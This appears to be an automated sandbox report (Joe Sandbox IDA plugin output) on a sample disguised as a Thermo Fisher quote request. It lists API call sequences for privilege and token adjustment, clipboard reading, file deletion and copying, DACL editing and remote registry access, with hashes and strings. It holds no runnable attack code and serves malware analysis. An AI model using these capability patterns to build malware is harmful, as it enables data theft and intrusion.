                                                              • SetForegroundWindow.USER32(000000FF), ref: 00673BA6
                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00673BCD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 4125248594-2988720461
                                                              • Opcode ID: 1ed8778892cf55ac905b0e1043f86ad1a86d157e1afcede562778db5c7f2d4e0
                                                              • Instruction ID: bde9a2a44fd7ec85e8ea0c59228dd0e6a07f005dd4fc33c43e2b9d73b823a163
                                                              • Opcode Fuzzy Hash: 1ed8778892cf55ac905b0e1043f86ad1a86d157e1afcede562778db5c7f2d4e0
                                                              • Instruction Fuzzy Hash: E0317671A40328BBEB306B658C49FBF7F6EEB44B50F104116FA05EA2D0D6B15D41ABB1
                                                              APIs
                                                                • Part of subcall function 0063B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0063B180
                                                                • Part of subcall function 0063B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0063B1AD
                                                                • Part of subcall function 0063B134: GetLastError.KERNEL32 ref: 0063B1BA
                                                              • _memset.LIBCMT ref: 0063AD08
                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0063AD5A
                                                              • CloseHandle.KERNEL32(?), ref: 0063AD6B
                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0063AD82
                                                              • GetProcessWindowStation.USER32 ref: 0063AD9B
                                                              • SetProcessWindowStation.USER32(00000000), ref: 0063ADA5
                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0063ADBF
                                                                • Part of subcall function 0063AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0063ACC0), ref: 0063AB99
                                                                • Part of subcall function 0063AB84: CloseHandle.KERNEL32(?,?,0063ACC0), ref: 0063ABAB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                              • String ID: $H*k$default$winsta0
                                                              • API String ID: 2063423040-2511175496
                                                              • Opcode ID: ce3d9098760373979f6c5a711b66d440b59d476429bda3409b2e6bf4bc507dc0
                                                              • Instruction ID: 5282d15ec80a602fc5e1d226c63c5c9867e6ce96a13330ecc1b78cae556e708e
                                                              • Opcode Fuzzy Hash: ce3d9098760373979f6c5a711b66d440b59d476429bda3409b2e6bf4bc507dc0
                                                              • Instruction Fuzzy Hash: A6816BB1900209BFDF119FE4DC49AEEBBBAEF04304F04411DF965A62A1D7318E55EBA1
                                                              APIs
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00645FA6,?), ref: 00646ED8
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00645FA6,?), ref: 00646EF1
                                                                • Part of subcall function 0064725E: __wsplitpath.LIBCMT ref: 0064727B
                                                                • Part of subcall function 0064725E: __wsplitpath.LIBCMT ref: 0064728E
                                                                • Part of subcall function 006472CB: GetFileAttributesW.KERNEL32(?,00646019), ref: 006472CC
                                                              • _wcscat.LIBCMT ref: 00646149
                                                              • _wcscat.LIBCMT ref: 00646167
                                                              • __wsplitpath.LIBCMT ref: 0064618E
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 006461A4
                                                              • _wcscpy.LIBCMT ref: 00646209
                                                              • _wcscat.LIBCMT ref: 0064621C
                                                              • _wcscat.LIBCMT ref: 0064622F
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0064625D
                                                              • DeleteFileW.KERNEL32(?), ref: 0064626E
                                                              • MoveFileW.KERNEL32(?,?), ref: 00646289
                                                              • MoveFileW.KERNEL32(?,?), ref: 00646298
                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 006462AD
                                                              • DeleteFileW.KERNEL32(?), ref: 006462BE
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 006462E1
                                                              • FindClose.KERNEL32(00000000), ref: 006462FD
                                                              • FindClose.KERNEL32(00000000), ref: 0064630B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                              • String ID: \*.*
                                                              • API String ID: 1917200108-1173974218
                                                              • Opcode ID: 1235da37dcb70117ec32ae8571a6f45725a0d9ed2558d67a7ad65e8b79bfc061
                                                              • Instruction ID: 3bad8d66e8d34353e1327e6f39d965856adfcef3411a299584c711dbf3730321
                                                              • Opcode Fuzzy Hash: 1235da37dcb70117ec32ae8571a6f45725a0d9ed2558d67a7ad65e8b79bfc061
                                                              • Instruction Fuzzy Hash: CE5120B290812C6ACB21EB95DC44DDF77BDAF06300F0501EAF585E3141DE769B498FA9
                                                              APIs
                                                              • OpenClipboard.USER32(0069DC00), ref: 00656B36
                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 00656B44
                                                              • GetClipboardData.USER32(0000000D), ref: 00656B4C
                                                              • CloseClipboard.USER32 ref: 00656B58
                                                              • GlobalLock.KERNEL32(00000000), ref: 00656B74
                                                              • CloseClipboard.USER32 ref: 00656B7E
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00656B93
                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 00656BA0
                                                              • GetClipboardData.USER32(00000001), ref: 00656BA8
                                                              • GlobalLock.KERNEL32(00000000), ref: 00656BB5
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00656BE9
                                                              • CloseClipboard.USER32 ref: 00656CF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                              • String ID:
                                                              • API String ID: 3222323430-0
                                                              • Opcode ID: 8e33c39d1f3641810c7dd2117729cb0a1fce3fdb2b8e8854c94237cdad395cf7
                                                              • Instruction ID: 610561f03dbfa2adfc485d97e448b8853105f88dcaf5348a8aa768dfaabb0b84
                                                              • Opcode Fuzzy Hash: 8e33c39d1f3641810c7dd2117729cb0a1fce3fdb2b8e8854c94237cdad395cf7
                                                              • Instruction Fuzzy Hash: 3B51B171240205ABD344AF60CD56F6F77AAAF54B12F40022DFA46D72D1EF70D909CB66
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0064F62B
                                                              • FindClose.KERNEL32(00000000), ref: 0064F67F
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064F6A4
                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0064F6BB
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0064F6E2
                                                              • __swprintf.LIBCMT ref: 0064F72E
                                                              • __swprintf.LIBCMT ref: 0064F767
                                                              • __swprintf.LIBCMT ref: 0064F7BB
                                                                • Part of subcall function 0062172B: __woutput_l.LIBCMT ref: 00621784
                                                              • __swprintf.LIBCMT ref: 0064F809
                                                              • __swprintf.LIBCMT ref: 0064F858
                                                              • __swprintf.LIBCMT ref: 0064F8A7
                                                              • __swprintf.LIBCMT ref: 0064F8F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                              • API String ID: 835046349-2428617273
                                                              • Opcode ID: 04556bbcda59cb8560e623c9a0cfe6c0ed6ac227adb2ebc3520c6550bd27ffb1
                                                              • Instruction ID: 12f0960e06960874a645eaf1132fda9be80e8ff63b041b5337ac30ffd063231d
                                                              • Opcode Fuzzy Hash: 04556bbcda59cb8560e623c9a0cfe6c0ed6ac227adb2ebc3520c6550bd27ffb1
                                                              • Instruction Fuzzy Hash: A6A131B2408344ABC354EBA4C895DAFB7EEAF98700F440D2DF585C6192EB34D949CB66
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00651B50
                                                              • _wcscmp.LIBCMT ref: 00651B65
                                                              • _wcscmp.LIBCMT ref: 00651B7C
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00651B8E
                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 00651BA8
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00651BC0
                                                              • FindClose.KERNEL32(00000000), ref: 00651BCB
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00651BE7
                                                              • _wcscmp.LIBCMT ref: 00651C0E
                                                              • _wcscmp.LIBCMT ref: 00651C25
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00651C37
                                                              • SetCurrentDirectoryW.KERNEL32(006B39FC), ref: 00651C55
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00651C5F
                                                              • FindClose.KERNEL32(00000000), ref: 00651C6C
                                                              • FindClose.KERNEL32(00000000), ref: 00651C7C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                              • String ID: *.*
                                                              • API String ID: 1803514871-438819550
                                                              • Opcode ID: 9837af177f3e60b0886c3f795d933446a1fcb5799e3b28182b8dfef3d6248af4
                                                              • Instruction ID: 45624721eefbc02d66ffc2e8f86db8e54717dc43afdef1e4e0575ed06ca40f8c
                                                              • Opcode Fuzzy Hash: 9837af177f3e60b0886c3f795d933446a1fcb5799e3b28182b8dfef3d6248af4
                                                              • Instruction Fuzzy Hash: BC31D5726002197BCF10ABA0DC89BDE77AE9F06321F100196FD11E61D0EB75DB898B64
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00651CAB
                                                              • _wcscmp.LIBCMT ref: 00651CC0
                                                              • _wcscmp.LIBCMT ref: 00651CD7
                                                                • Part of subcall function 00646BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00646BEF
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00651D06
                                                              • FindClose.KERNEL32(00000000), ref: 00651D11
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00651D2D
                                                              • _wcscmp.LIBCMT ref: 00651D54
                                                              • _wcscmp.LIBCMT ref: 00651D6B
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00651D7D
                                                              • SetCurrentDirectoryW.KERNEL32(006B39FC), ref: 00651D9B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00651DA5
                                                              • FindClose.KERNEL32(00000000), ref: 00651DB2
                                                              • FindClose.KERNEL32(00000000), ref: 00651DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 1824444939-438819550
                                                              • Opcode ID: c56784aa0138b4b380bfb2fd3072a54605b42ff71d6a6f8c70e85339749522f0
                                                              • Instruction ID: 72a513827432829f61973913a95b6a12f147cdb59e530dc4d61da38740f4f6eb
                                                              • Opcode Fuzzy Hash: c56784aa0138b4b380bfb2fd3072a54605b42ff71d6a6f8c70e85339749522f0
                                                              • Instruction Fuzzy Hash: D231B27250061A7ACF10ABA0EC49BEE77BF9F46325F100695FC11A62D0DB74DA898F64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                              • API String ID: 2102423945-2023335898
                                                              • Opcode ID: 2dcdc83916a80541c5b62e566aa5d6deef8a1c11eaec8eaf91f85cfc27ed899e
                                                              • Instruction ID: c53340ed93a8ac7fb6aa6fd8ad029b22ec53d226af1c3c2dc01ccc8fc695dc61
                                                              • Opcode Fuzzy Hash: 2dcdc83916a80541c5b62e566aa5d6deef8a1c11eaec8eaf91f85cfc27ed899e
                                                              • Instruction Fuzzy Hash: 27829271D44219DFDB28CF98C880AEEB7B2FF44310F258169D859AB391E774AD85CB90
                                                              APIs
                                                              • GetLocalTime.KERNEL32(?), ref: 006509DF
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 006509EF
                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 006509FB
                                                              • __wsplitpath.LIBCMT ref: 00650A59
                                                              • _wcscat.LIBCMT ref: 00650A71
                                                              • _wcscat.LIBCMT ref: 00650A83
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00650A98
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650AAC
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650ADE
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00650AFF
                                                              • _wcscpy.LIBCMT ref: 00650B0B
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00650B4A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                              • String ID: *.*
                                                              • API String ID: 3566783562-438819550
                                                              • Opcode ID: 8e528933c12a8cfa91efb48cd529417825e76a7708b424ad3440b2c6114c0a7f
                                                              • Instruction ID: c6d4805566d01a1662bf39486717d641ddf222c826cabba9c4c89b4e545a5f2d
                                                              • Opcode Fuzzy Hash: 8e528933c12a8cfa91efb48cd529417825e76a7708b424ad3440b2c6114c0a7f
                                                              • Instruction Fuzzy Hash: F06149B2504305AFD750EF60C88599EB3EAFF89310F04491EF98987252DB31EA49CB96
                                                              APIs
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0063ABD7
                                                                • Part of subcall function 0063ABBB: GetLastError.KERNEL32(?,0063A69F,?,?,?), ref: 0063ABE1
                                                                • Part of subcall function 0063ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0063A69F,?,?,?), ref: 0063ABF0
                                                                • Part of subcall function 0063ABBB: HeapAlloc.KERNEL32(00000000,?,0063A69F,?,?,?), ref: 0063ABF7
                                                                • Part of subcall function 0063ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0063AC0E
                                                                • Part of subcall function 0063AC56: GetProcessHeap.KERNEL32(00000008,0063A6B5,00000000,00000000,?,0063A6B5,?), ref: 0063AC62
                                                                • Part of subcall function 0063AC56: HeapAlloc.KERNEL32(00000000,?,0063A6B5,?), ref: 0063AC69
                                                                • Part of subcall function 0063AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0063A6B5,?), ref: 0063AC7A
                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0063A6D0
                                                              • _memset.LIBCMT ref: 0063A6E5
                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0063A704
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A715
                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 0063A752
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0063A76E
                                                              • GetLengthSid.ADVAPI32(?), ref: 0063A78B
                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0063A79A
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0063A7A1
                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0063A7C2
                                                              • CopySid.ADVAPI32(00000000), ref: 0063A7C9
                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0063A7FA
                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0063A820
                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0063A834
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                              • String ID:
                                                              • API String ID: 3996160137-0
                                                              • Opcode ID: b8c07dca582ca2336a50350d1d084dab6606d584d56dfe7a9e5345847799a4e1
                                                              • Instruction ID: 02bd7c2289327c79cb125b32ed982c0142cbb1edc192cecb801f7a80ae0328d9
                                                              • Opcode Fuzzy Hash: b8c07dca582ca2336a50350d1d084dab6606d584d56dfe7a9e5345847799a4e1
                                                              • Instruction Fuzzy Hash: D7514C71900209BBDF10DFA5DC85EEEBBBAFF04300F048129F951AB291DB359A05DBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: j$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$jjj j
                                                              • API String ID: 0-196589705
                                                              • Opcode ID: 15cada82bc8e8ea18143dce21359a0a9654275325aef59d2de07942b40822571
                                                              • Instruction ID: 879aafb33ed01bc6df9ea423aea20bc83fc2787f3b523619e5b2aae9a13a263e
                                                              • Opcode Fuzzy Hash: 15cada82bc8e8ea18143dce21359a0a9654275325aef59d2de07942b40822571
                                                              • Instruction Fuzzy Hash: 06728171E4422ACBDB28DF58C8507EEB7B6BF44710F14816AE845EB381DB709E81CB94
                                                              APIs
                                                                • Part of subcall function 00646EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00645FA6,?), ref: 00646ED8
                                                                • Part of subcall function 006472CB: GetFileAttributesW.KERNEL32(?,00646019), ref: 006472CC
                                                              • _wcscat.LIBCMT ref: 00646441
                                                              • __wsplitpath.LIBCMT ref: 0064645F
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00646474
                                                              • _wcscpy.LIBCMT ref: 006464A3
                                                              • _wcscat.LIBCMT ref: 006464B8
                                                              • _wcscat.LIBCMT ref: 006464CA
                                                              • DeleteFileW.KERNEL32(?), ref: 006464DA
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 006464EB
                                                              • FindClose.KERNEL32(00000000), ref: 00646506
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                              • String ID: \*.*
                                                              • API String ID: 2643075503-1173974218
                                                              • Opcode ID: 10237f61f86de603e80fcb9c2c1fa74ffb4f9b05aaf46ad9d8723e25bc25794e
                                                              • Instruction ID: 5f041071265a5f792b1fd9856b246325622a687b9ebf061edf712bcd5305610f
                                                              • Opcode Fuzzy Hash: 10237f61f86de603e80fcb9c2c1fa74ffb4f9b05aaf46ad9d8723e25bc25794e
                                                              • Instruction Fuzzy Hash: 593186B2408384AAC721DBA4C885DDB77DDAF56310F44492EF5D8C3142EA35D50987A7
                                                              APIs
                                                                • Part of subcall function 00663C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00662BB5,?,?), ref: 00663C1D
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0066328E
                                                                • Part of subcall function 0060936C: __swprintf.LIBCMT ref: 006093AB
                                                                • Part of subcall function 0060936C: __itow.LIBCMT ref: 006093DF
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0066332D
